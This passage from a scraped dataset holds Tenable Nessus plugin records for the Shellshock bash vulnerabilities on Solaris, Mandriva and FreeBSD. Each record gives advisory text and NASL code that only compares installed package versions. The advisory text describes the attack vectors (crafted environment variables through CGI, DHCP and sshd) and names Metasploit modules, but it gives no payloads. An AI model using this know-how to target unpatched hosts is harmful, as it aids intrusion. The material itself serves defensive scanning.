# https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4a913f44\");\n # https://blogs.oracle.com/sunsecurity/multiple-vulnerabilities-in-bash\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e15b61cf\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Solaris 11.2.2.8.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Solaris Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^bash$\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.2.2.0.8.0\", sru:\"SRU 11.2.2.8.0\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : bash\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_hole(port:0, extra:error_extra);\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"bash\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-28T15:25:55", "description": "Updated bash packages fix security vulnerability :\n\nA flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue (CVE-2014-6271).\n\nThis vulnerability can be exposed and exploited through several other pieces of software and should be considered highly critical. Please refer to the RedHat Knowledge Base article and blog post for more information.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue (CVE-2014-7169).\n\nBash has been updated to version 4.2 patch level 50, which further mitigates ShellShock-type vulnerabilities. Two such issues have already been discovered (CVE-2014-6277, CVE-2014-6278).\n\nSee the RedHat article on the backward-incompatible changes introduced by the latest patch, caused by adding prefixes and suffixes to the variable names used for exporting functions. Note that the RedHat article mentions these variable names will have parentheses '()' at the end of their names, however, the latest upstream patch uses two percent signs '%%' at the end instead.\n\nTwo other unrelated security issues in the parser have also been fixed in this update (CVE-2014-7186, CVE-2014-7187).\n\nAll users and sysadmins are advised to update their bash package immediately.", "cvss3": {"score": null, "vector": null}, "published": "2015-03-30T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : bash (MDVSA-2015:164)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:bash", "p-cpe:/a:mandriva:linux:bash-doc", "cpe:/o:mandriva:business_server:2"], "id": "MANDRIVA_MDVSA-2015-164.NASL", "href": "https://www.tenable.com/plugins/nessus/82417", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2015:164. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82417);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"MDVSA\", value:\"2015:164\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Mandriva Linux Security Advisory : bash (MDVSA-2015:164)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Updated bash packages fix security vulnerability :\n\nA flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. Certain\nservices and applications allow remote unauthenticated attackers to\nprovide environment variables, allowing them to exploit this issue\n(CVE-2014-6271).\n\nThis vulnerability can be exposed and exploited through several other\npieces of software and should be considered highly critical. Please\nrefer to the RedHat Knowledge Base article and blog post for more\ninformation.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue\n(CVE-2014-7169).\n\nBash has been updated to version 4.2 patch level 50, which further\nmitigates ShellShock-type vulnerabilities. Two such issues have\nalready been discovered (CVE-2014-6277, CVE-2014-6278).\n\nSee the RedHat article on the backward-incompatible changes introduced\nby the latest patch, caused by adding prefixes and suffixes to the\nvariable names used for exporting functions. Note that the RedHat\narticle mentions these variable names will have parentheses '()' at\nthe end of their names, however, the latest upstream patch uses two\npercent signs '%%' at the end instead.\n\nTwo other unrelated security issues in the parser have also been fixed\nin this update (CVE-2014-7186, CVE-2014-7187).\n\nAll users and sysadmins are advised to update their bash package\nimmediately.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://advisories.mageia.org/MGASA-2014-0388.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://advisories.mageia.org/MGASA-2014-0393.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/articles/1200223\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash and / or bash-doc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:2\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"bash-4.2-53.1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"bash-doc-4.2-53.1.mbs2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-28T15:57:46", "description": "The remote Solaris system is missing necessary patches to address security updates :\n\n - GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka 'ShellShock.' NOTE:\n the original fix for this issue was incorrect;\n CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix. (CVE-2014-6271)\n\n - GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169. (CVE-2014-6277)\n\n - GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary commands via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277. (CVE-2014-6278)\n\n - GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271. (CVE-2014-7169)\n\n - The redirection implementation in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted use of here documents, aka the 'redir_stack' issue. (CVE-2014-7186)\n\n - Off-by-one error in the read_token_word function in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via deeply nested for loops, aka the 'word_lineno' issue. (CVE-2014-7187)", "cvss3": {"score": null, "vector": null}, "published": "2016-02-02T00:00:00", "type": "nessus", "title": "Oracle Solaris Third-Party Patch Update : bash (multiple_vulnerabilities_in_bash1) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:oracle:solaris:11.2", "p-cpe:/a:oracle:solaris:bash"], "id": "SOLARIS11_BASH_20141031_2.NASL", "href": "https://www.tenable.com/plugins/nessus/88514", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88514);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : bash (multiple_vulnerabilities_in_bash1) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - GNU Bash through 4.3 processes trailing strings after\n function definitions in the values of environment\n variables, which allows remote attackers to execute\n arbitrary code via a crafted environment, as\n demonstrated by vectors involving the ForceCommand\n feature in OpenSSH sshd, the mod_cgi and mod_cgid\n modules in the Apache HTTP Server, scripts executed by\n unspecified DHCP clients, and other situations in which\n setting the environment occurs across a privilege\n boundary from Bash execution, aka 'ShellShock.' NOTE:\n the original fix for this issue was incorrect;\n CVE-2014-7169 has been assigned to cover the\n vulnerability that is still present after the incorrect\n fix. (CVE-2014-6271)\n\n - GNU Bash through 4.3 bash43-026 does not properly parse\n function definitions in the values of environment\n variables, which allows remote attackers to execute\n arbitrary code or cause a denial of service\n (uninitialized memory access, and untrusted-pointer read\n and write operations) via a crafted environment, as\n demonstrated by vectors involving the ForceCommand\n feature in OpenSSH sshd, the mod_cgi and mod_cgid\n modules in the Apache HTTP Server, scripts executed by\n unspecified DHCP clients, and other situations in which\n setting the environment occurs across a privilege\n boundary from Bash execution. NOTE: this vulnerability\n exists because of an incomplete fix for CVE-2014-6271\n and CVE-2014-7169. (CVE-2014-6277)\n\n - GNU Bash through 4.3 bash43-026 does not properly parse\n function definitions in the values of environment\n variables, which allows remote attackers to execute\n arbitrary commands via a crafted environment, as\n demonstrated by vectors involving the ForceCommand\n feature in OpenSSH sshd, the mod_cgi and mod_cgid\n modules in the Apache HTTP Server, scripts executed by\n unspecified DHCP clients, and other situations in which\n setting the environment occurs across a privilege\n boundary from Bash execution. NOTE: this vulnerability\n exists because of an incomplete fix for CVE-2014-6271,\n CVE-2014-7169, and CVE-2014-6277. (CVE-2014-6278)\n\n - GNU Bash through 4.3 bash43-025 processes trailing\n strings after certain malformed function definitions in\n the values of environment variables, which allows remote\n attackers to write to files or possibly have unknown\n other impact via a crafted environment, as demonstrated\n by vectors involving the ForceCommand feature in OpenSSH\n sshd, the mod_cgi and mod_cgid modules in the Apache\n HTTP Server, scripts executed by unspecified DHCP\n clients, and other situations in which setting the\n environment occurs across a privilege boundary from Bash\n execution. NOTE: this vulnerability exists because of an\n incomplete fix for CVE-2014-6271. (CVE-2014-7169)\n\n - The redirection implementation in parse.y in GNU Bash\n through 4.3 bash43-026 allows remote attackers to cause\n a denial of service (out-of-bounds array access and\n application crash) or possibly have unspecified other\n impact via crafted use of here documents, aka the\n 'redir_stack' issue. (CVE-2014-7186)\n\n - Off-by-one error in the read_token_word function in\n parse.y in GNU Bash through 4.3 bash43-026 allows remote\n attackers to cause a denial of service (out-of-bounds\n array access and application crash) or possibly have\n unspecified other impact via deeply nested for loops,\n aka the 'word_lineno' issue. (CVE-2014-7187)\");\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4a913f44\");\n # https://blogs.oracle.com/sunsecurity/multiple-vulnerabilities-in-bash\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e15b61cf\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Solaris 11.2.5.5.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Solaris Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^bash$\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.2.5.0.5.0\", sru:\"SRU 11.2.5.5.0\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : bash\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_hole(port:0, extra:error_extra);\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"bash\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:58:36", "description": "Best Practical reports :\n\nRT 4.2.0 and above may be vulnerable to arbitrary execution of code by way of CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, or CVE-2014-6271 -- collectively known as 'Shellshock.' This vulnerability requires a privileged user with access to an RT instance running with SMIME integration enabled; it applies to both mod_perl and fastcgi deployments. If you have already taken upgrades to bash to resolve 'Shellshock,' you are protected from this vulnerability in RT, and there is no need to apply this patch. This vulnerability has been assigned CVE-2014-7227.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-10-03T00:00:00", "type": "nessus", "title": "FreeBSD : rt42 -- vulnerabilities related to shellshock (81e2b308-4a6c-11e4-b711-6805ca0b3d42)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187", "CVE-2014-7227"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:rt42", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_81E2B3084A6C11E4B7116805CA0B3D42.NASL", "href": "https://www.tenable.com/plugins/nessus/78039", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78039);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"FreeBSD : rt42 -- vulnerabilities related to shellshock (81e2b308-4a6c-11e4-b711-6805ca0b3d42)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Best Practical reports :\n\nRT 4.2.0 and above may be vulnerable to arbitrary execution of code by\nway of CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, or\nCVE-2014-6271 -- collectively known as 'Shellshock.' This\nvulnerability requires a privileged user with access to an RT instance\nrunning with SMIME integration enabled; it applies to both mod_perl\nand fastcgi deployments. If you have already taken upgrades to bash to\nresolve 'Shellshock,' you are protected from this vulnerability in RT,\nand there is no need to apply this patch. This vulnerability has been\nassigned CVE-2014-7227.\");\n # http://blog.bestpractical.com/2014/10/security-vulnerability-in-rt-42x-cve-2014-7227.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?42ab1f4e\");\n # https://vuxml.freebsd.org/freebsd/81e2b308-4a6c-11e4-b711-6805ca0b3d42.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eaee6eb3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rt42\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"rt42>=4.2.0<4.2.8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:58:13", "description": "The remote Solaris system is missing necessary patches to address critical security updates related to 'Shellshock' :\n\n - GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the 'mod_cgi' and 'mod_cgid' modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, also known as 'Shellshock.' Note that the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix. (CVE-2014-6271)\n\n - GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the 'mod_cgi' and 'mod_cgid' modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. Note that this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169. (CVE-2014-6277)\n\n - GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary commands via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the 'mod_cgi' and 'mod_cgid' modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. Note that this vulnerability exists because of an incomplete fix for CVE-2014-6271, 